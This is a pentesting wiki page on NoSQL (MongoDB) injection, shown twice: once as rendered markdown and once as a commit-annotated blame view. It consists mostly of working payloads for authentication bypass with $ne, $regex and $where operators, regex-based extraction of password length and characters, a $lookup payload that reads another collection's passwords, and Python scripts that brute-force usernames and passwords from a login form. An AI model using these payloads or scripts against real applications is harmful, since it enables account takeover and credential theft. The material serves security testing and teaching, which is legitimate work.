hacktricks/pentesting-web/nosql-injection.md

# NoSQL injection

![](<../.gitbook/assets/image (9) (1) (2).png>)

\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

<details>

<summary><strong>HackTricks in</strong> <a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️</strong> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>

NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.

## Exploit

In PHP you can send an Array changing the sent parameter from _parameter=foo_ to _parameter\[arrName]=foo._

The exploits are based in adding an **Operator**:

```bash
username[$ne]=1$password[$ne]=1 #<Not Equals>
username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter
username[$regex]=.{25}&pass[$ne]=1 #Use the <regex> to find the length of a value
username[$eq]=admin&password[$ne]=1 #<Equals>
username[$ne]=admin&pass[$lt]=s #<Less than>, Brute-force pass[$lt] to find more users
username[$ne]=admin&pass[$gt]=s #<Greater Than>
username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin)
{ $where: "this.credits == this.debits" }#<IF>, can be used to execute code
```

### Basic authentication bypass

**Using not equal ($ne) or greater ($gt)**

```bash
#in URL
username[$ne]=toto&password[$ne]=toto
username[$regex]=.*&password[$regex]=.*
username[$exists]=true&password[$exists]=true

#in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
```

### **SQL - Mongo**

```
Normal sql: ' or 1=1-- -
Mongo sql: ' || 1==1//    or    ' || 1==1%00
```

### Extract **length** information

```bash
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
# True if the length equals 1,3...
```

### Extract **data** information

```
in URL (if length == 3)
username[$ne]=toto&password[$regex]=a.{2}
username[$ne]=toto&password[$regex]=b.{2}
...
username[$ne]=toto&password[$regex]=m.{2}
username[$ne]=toto&password[$regex]=md.{1}
username[$ne]=toto&password[$regex]=mdp

username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=md.*

in JSON
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
```

### **SQL - Mongo**

```
/?search=admin' && this.password%00 --> Check if the field password exists
/?search=admin' && this.password && this.password.match(/.*/)%00 --> start matching password
/?search=admin' && this.password && this.password.match(/^a.*$/)%00
/?search=admin' && this.password && this.password.match(/^b.*$/)%00
/?search=admin' && this.password && this.password.match(/^c.*$/)%00
...
/?search=admin' && this.password && this.password.match(/^duvj.*$/)%00
...
/?search=admin' && this.password && this.password.match(/^duvj78i3u$/)%00  Found
```

### PHP Arbitrary Function Execution

Using the **$func** operator of the [MongoLite](https://github.com/agentejo/cockpit/tree/0.11.1/lib/MongoLite) library (used by default) it might be possible to execute and arbitrary function as in [this report](https://swarm.ptsecurity.com/rce-cockpit-cms/).

```python
"user":{"$func": "var_dump"}
```

![](<../.gitbook/assets/image (468).png>)

### Get info from different collection

It's possible to use [**$lookup**](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/) to get info from a different collection. In the following example, we are reading from a **different collection** called **`users`** and getting the **results of all the entries** with a password matching a wildcard.

```json
[
  {
    "$lookup":{
      "from": "users",
      "as":"resultado","pipeline": [
        {
          "$match":{
            "password":{
              "$regex":"^.*"
            }
          }
        }
      ]
    }
  }
]
```


![](<../.gitbook/assets/image (9) (1) (2).png>)

\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

## Blind NoSQL

```python
import requests, string

alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(21):
    print("[i] Looking for char number "+str(i+1))
    for char in alphabet:
        r = requests.get("http://chall.com?param=^"+flag+char)
        if ("<TRUE>" in r.text):
            flag += char
            print("[+] Flag: "+flag)
            break
```

```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()

username="admin"
password=""

while True:
    for c in string.printable:
        if c not in ['*','+','.','?','|']:
            payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
            r = requests.post(u, data = {'ids': payload}, verify = False)
            if 'OK' in r.text:
                print("Found one more char : %s" % (password+c))
                password += c
```

## MongoDB Payloads

```
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
```

## Tools

* [https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration](https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration)
* [https://github.com/C4l1b4n/NoSQL-Attack-Suite](https://github.com/C4l1b4n/NoSQL-Attack-Suite)

### Brute-force login usernames and passwords from POST login

This is a simple script that you could modify but the previous tools can also do this task.

```python
import requests
import string

url = "http://example.com"
headers = {"Host": "exmaple.com"}
cookies = {"PHPSESSID": "s3gcsgtqre05bah2vt6tibq8lsdfk"}
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]
def get_password(username):
    print("Extracting password of "+username)
    params = {"username":username, "password[$regex]":"", "login": "login"}
    password = "^"
    while True:
        for c in possible_chars:
            params["password[$regex]"] = password + c + ".*"
            pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
            if int(pr.status_code) == 302:
                password += c
                break
        if c == possible_chars[-1]:
            print("Found password "+password[1:].replace("\\", "")+" for username "+username)
            return password[1:].replace("\\", "")

def get_usernames():
    usernames = []
    params = {"username[$regex]":"", "password[$regex]":".*", "login": "login"}
    for c in possible_chars:
        username = "^" + c
        params["username[$regex]"] = username + ".*"
        pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
        if int(pr.status_code) == 302:
            print("Found username starting with "+c)
            while True:
                for c2 in possible_chars:
                    params["username[$regex]"] = username + c2 + ".*"
                    if int(requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False).status_code) == 302:
                        username += c2
                        print(username)
                        break

                if c2 == possible_chars[-1]:
                    print("Found username: "+username[1:])
                    usernames.append(username[1:])
                    break
    return usernames


for u in get_usernames():
    get_password(u)
```

## References

* [https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media](https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)

<details>

<summary><strong>HackTricks in</strong> <a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️</strong> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>

![](<../.gitbook/assets/image (9) (1) (2).png>)

\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
GitBook: [#3432] No subject 2022-08-31 22:35:39 +00:00			`# NoSQL injection`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00			`![](<../.gitbook/assets/image (9) (1) (2).png>)`
GitBook: [#3432] No subject 2022-08-31 22:35:39 +00:00
			`\`
GitBook: [#3444] No subject 2022-09-01 23:40:55 +00:00			`Use [Trickest](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and automate workflows powered by the world's most advanced community tools.\`
GitBook: [#3432] No subject 2022-08-31 22:35:39 +00:00			`Get Access Today:`

			`{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

GITBOOK-3830: No subject 2023-03-23 14:03:29 +00:00			`<summary><strong>HackTricks in</strong> <a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️</strong> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00			`* Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`
GITBOOK-3830: No subject 2023-03-23 14:03:29 +00:00			`* Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.`

GitBook: [#3432] No subject 2022-08-31 22:35:39 +00:00			`## Exploit`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`In PHP you can send an Array changing the sent parameter from _parameter=foo_ to _parameter\[arrName]=foo._`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`The exploits are based in adding an Operator:`

			```bash
			`username[$ne]=1$password[$ne]=1 #<Not Equals>`
			`username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter`
			`username[$regex]=.{25}&pass[$ne]=1 #Use the <regex> to find the length of a value`
GitBook: [master] one page modified 2021-04-19 22:42:22 +00:00			`username[$eq]=admin&password[$ne]=1 #<Equals>`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`username[$ne]=admin&pass[$lt]=s #<Less than>, Brute-force pass[$lt] to find more users`
			`username[$ne]=admin&pass[$gt]=s #<Greater Than>`
			`username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin)`
			`{ $where: "this.credits == this.debits" }#<IF>, can be used to execute code`
			```

GitBook: [#3432] No subject 2022-08-31 22:35:39 +00:00			`### Basic authentication bypass`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`Using not equal ($ne) or greater ($gt)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			```bash
			`#in URL`
			`username[$ne]=toto&password[$ne]=toto`
GitBook: [master] 5 pages modified 2021-06-26 15:50:17 +00:00			`username[$regex]=.&password[$regex]=.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`username[$exists]=true&password[$exists]=true`

			`#in JSON`
			`{"username": {"$ne": null}, "password": {"$ne": null} }`
			`{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }`
			`{"username": {"$gt": undefined}, "password": {"$gt": undefined} }`
			```

GitBook: [#3432] No subject 2022-08-31 22:35:39 +00:00			`### SQL - Mongo`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`Normal sql: ' or 1=1-- -`
			`Mongo sql: ' \|\| 1==1// or ' \|\| 1==1%00`
			```

GitBook: [#3432] No subject 2022-08-31 22:35:39 +00:00			`### Extract length information`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			```bash
			`username[$ne]=toto&password[$regex]=.{1}`
			`username[$ne]=toto&password[$regex]=.{3}`
			`# True if the length equals 1,3...`
			```

GitBook: [#3432] No subject 2022-08-31 22:35:39 +00:00			`### Extract data information`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`in URL (if length == 3)`
			`username[$ne]=toto&password[$regex]=a.{2}`
			`username[$ne]=toto&password[$regex]=b.{2}`
			`...`
			`username[$ne]=toto&password[$regex]=m.{2}`
			`username[$ne]=toto&password[$regex]=md.{1}`
			`username[$ne]=toto&password[$regex]=mdp`

			`username[$ne]=toto&password[$regex]=m.*`
			`username[$ne]=toto&password[$regex]=md.*`

			`in JSON`
			`{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}`
			`{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}`
			`{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}`
			```

GitBook: [#3432] No subject 2022-08-31 22:35:39 +00:00			`### SQL - Mongo`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`/?search=admin' && this.password%00 --> Check if the field password exists`
			`/?search=admin' && this.password && this.password.match(/.*/)%00 --> start matching password`
			`/?search=admin' && this.password && this.password.match(/^a.*$/)%00`
			`/?search=admin' && this.password && this.password.match(/^b.*$/)%00`
			`/?search=admin' && this.password && this.password.match(/^c.*$/)%00`
			`...`
			`/?search=admin' && this.password && this.password.match(/^duvj.*$/)%00`
			`...`
			`/?search=admin' && this.password && this.password.match(/^duvj78i3u$/)%00 Found`
			```

GitBook: [#3432] No subject 2022-08-31 22:35:39 +00:00			`### PHP Arbitrary Function Execution`
GitBook: [master] one page and one asset modified 2021-04-30 09:16:21 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`Using the $func operator of the [MongoLite](https://github.com/agentejo/cockpit/tree/0.11.1/lib/MongoLite) library (used by default) it might be possible to execute and arbitrary function as in [this report](https://swarm.ptsecurity.com/rce-cockpit-cms/).`
GitBook: [master] one page and one asset modified 2021-04-30 09:16:21 +00:00
			```python
			`"user":{"$func": "var_dump"}`
			```

GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`![](<../.gitbook/assets/image (468).png>)`
GitBook: [master] one page and one asset modified 2021-04-30 09:16:21 +00:00
GITBOOK-3830: No subject 2023-03-23 14:03:29 +00:00			`### Get info from different collection`

			It's possible to use [$lookup](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/) to get info from a different collection. In the following example, we are reading from a different collection called `users` and getting the results of all the entries with a password matching a wildcard.

			```json
			`[`
			`{`
			`"$lookup":{`
			`"from": "users",`
			`"as":"resultado","pipeline": [`
			`{`
			`"$match":{`
			`"password":{`
			`"$regex":"^.*"`
			`}`
			`}`
			`}`
			`]`
			`}`
			`}`
			`]`
			```





GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00			`![](<../.gitbook/assets/image (9) (1) (2).png>)`
GitBook: [#3432] No subject 2022-08-31 22:35:39 +00:00
			`\`
GitBook: [#3444] No subject 2022-09-01 23:40:55 +00:00			`Use [Trickest](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and automate workflows powered by the world's most advanced community tools.\`
GitBook: [#3432] No subject 2022-08-31 22:35:39 +00:00			`Get Access Today:`

			`{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}`

			`## Blind NoSQL`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			```python
			`import requests, string`

			`alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_@{}-/()!\"$%=^[]:;"`

			`flag = ""`
			`for i in range(21):`
			`print("[i] Looking for char number "+str(i+1))`
			`for char in alphabet:`
			`r = requests.get("http://chall.com?param=^"+flag+char)`
			`if ("<TRUE>" in r.text):`
			`flag += char`
			`print("[+] Flag: "+flag)`
			`break`
			```

			```python
			`import requests`
			`import urllib3`
			`import string`
			`import urllib`
			`urllib3.disable_warnings()`

			`username="admin"`
			`password=""`

			`while True:`
			`for c in string.printable:`
			`if c not in ['*','+','.','?','\|']:`
			`payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)`
			`r = requests.post(u, data = {'ids': payload}, verify = False)`
			`if 'OK' in r.text:`
			`print("Found one more char : %s" % (password+c))`
			`password += c`
			```

GitBook: [#3432] No subject 2022-08-31 22:35:39 +00:00			`## MongoDB Payloads`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`true, $where: '1 == 1'`
			`, $where: '1 == 1'`
			`$where: '1 == 1'`
			`', $where: '1 == 1'`
			`1, $where: '1 == 1'`
			`{ $ne: 1 }`
			`', $or: [ {}, { 'a':'a`
			`' } ], $comment:'successful MongoDB injection'`
			`db.injection.insert({success:1});`
			`db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1`
			`\|\| 1==1`
			`' && this.password.match(/.*/)//+%00`
			`' && this.passwordzz.match(/.*/)//+%00`
			`'%20%26%26%20this.password.match(/.*/)//+%00`
			`'%20%26%26%20this.passwordzz.match(/.*/)//+%00`
			`{$gt: ''}`
			`[$ne]=1`
			```

GitBook: [#3432] No subject 2022-08-31 22:35:39 +00:00			`## Tools`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`* [https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration](https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration)`
GitBook: [#2949] No subject 2022-01-14 10:22:14 +00:00			`* [https://github.com/C4l1b4n/NoSQL-Attack-Suite](https://github.com/C4l1b4n/NoSQL-Attack-Suite)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#3432] No subject 2022-08-31 22:35:39 +00:00			`### Brute-force login usernames and passwords from POST login`
GitBook: [#2949] No subject 2022-01-14 10:22:14 +00:00
			`This is a simple script that you could modify but the previous tools can also do this task.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			```python
			`import requests`
			`import string`

			`url = "http://example.com"`
			`headers = {"Host": "exmaple.com"}`
			`cookies = {"PHPSESSID": "s3gcsgtqre05bah2vt6tibq8lsdfk"}`
			`possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]`
			`def get_password(username):`
			`print("Extracting password of "+username)`
			`params = {"username":username, "password[$regex]":"", "login": "login"}`
			`password = "^"`
			`while True:`
			`for c in possible_chars:`
			`params["password[$regex]"] = password + c + ".*"`
			`pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)`
			`if int(pr.status_code) == 302:`
			`password += c`
			`break`
			`if c == possible_chars[-1]:`
			`print("Found password "+password[1:].replace("\\", "")+" for username "+username)`
			`return password[1:].replace("\\", "")`

			`def get_usernames():`
			`usernames = []`
			`params = {"username[$regex]":"", "password[$regex]":".*", "login": "login"}`
			`for c in possible_chars:`
			`username = "^" + c`
			`params["username[$regex]"] = username + ".*"`
			`pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)`
			`if int(pr.status_code) == 302:`
			`print("Found username starting with "+c)`
			`while True:`
			`for c2 in possible_chars:`
			`params["username[$regex]"] = username + c2 + ".*"`
			`if int(requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False).status_code) == 302:`
			`username += c2`
			`print(username)`
			`break`

			`if c2 == possible_chars[-1]:`
			`print("Found username: "+username[1:])`
			`usernames.append(username[1:])`
			`break`
			`return usernames`


			`for u in get_usernames():`
			`get_password(u)`
			```

GitBook: [#3432] No subject 2022-08-31 22:35:39 +00:00			`## References`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GitBook: [#3432] No subject 2022-08-31 22:35:39 +00:00			`* [https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media](https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media)`
GitBook: [#3471] No subject 2022-09-09 11:00:52 +00:00			`* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

GITBOOK-3830: No subject 2023-03-23 14:03:29 +00:00			`<summary><strong>HackTricks in</strong> <a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️</strong> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00			`* Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`
GITBOOK-3830: No subject 2023-03-23 14:03:29 +00:00			`* Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00			`![](<../.gitbook/assets/image (9) (1) (2).png>)`
GitBook: [#3432] No subject 2022-08-31 22:35:39 +00:00
			`\`
GitBook: [#3444] No subject 2022-09-01 23:40:55 +00:00			`Use [Trickest](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and automate workflows powered by the world's most advanced community tools.\`
GitBook: [#3432] No subject 2022-08-31 22:35:39 +00:00			`Get Access Today:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GitBook: [#3432] No subject 2022-08-31 22:35:39 +00:00			`{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}`